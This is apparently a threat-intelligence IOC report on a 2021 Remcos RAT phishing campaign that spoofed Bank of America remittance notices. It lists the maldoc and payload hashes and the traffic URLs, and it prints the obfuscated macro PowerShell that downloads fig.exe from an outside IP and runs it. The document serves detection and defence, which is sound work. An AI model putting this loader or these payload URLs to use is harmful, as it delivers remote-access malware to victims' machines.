2021-09-15 Remcos IOCs

THREAT ATTRIBUTION:  REMCOS RAT

SUBJECTS OBSERVED
Bank of America ACH Remittance Notification - <Company Name>

SENDERS OBSERVED
e.remittance.reporting@bofa.com

MALDOC FILE HASHES
BoFA Payment Advice_2021159.xls
6023b3bd382b382f17638d5d6ba14ec3

POWERSHELL FROM MACROS IN THE MALDOC
$we22='(New-Obje' + 'ct Net.We'; $b4df='bCl' + 'ient).Downlo'; $c3='adFile(''http://192.210.214.221/fig.exe'',$env:temp+''\fig.exe'')';;$TC=$we22,$b4df,$c3 -Join '';IEX($TC);start-process($env:temp+ '\fig.exe')

REMCOS PAYLOAD URLS
http://192.210.214.221/fig.exe

REMCOS PAYLOAD FILE HASH
fig.exe
9b8ae8edfe553edea6108dceebcc57b8

Renamed and copied to AppData:
Dsqbhgvf.exe
9b8ae8edfe553edea6108dceebcc57b8

REMCOS TRAFFIC
https://qclvzw.sn.files.1drv.com/y4m10y2D0E738Ta7QyAWFQrbZbshjB71RCXOuYksolWKQ_KWmBUKAFs9LgIRJLarDbFkTZrV26LwXQ1x6hzQQbCrghpgZFqiiPVc1L9VvTs3t-laGG8RDEOQYCKSsRVHz6FmxHcwSwX8u1YaMKfQa6UP2wjbifB4voAU4kBSrH9d94G_y7N03DNRVJdMn4gRk-4Aon2zOQjWmNwJvyiuhl3yA/Dsqbhgvfcbfuajfyoyryjvltgfkcgym?download&psid=1

https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21152&authkey=AE2CCjQLLuUlkL4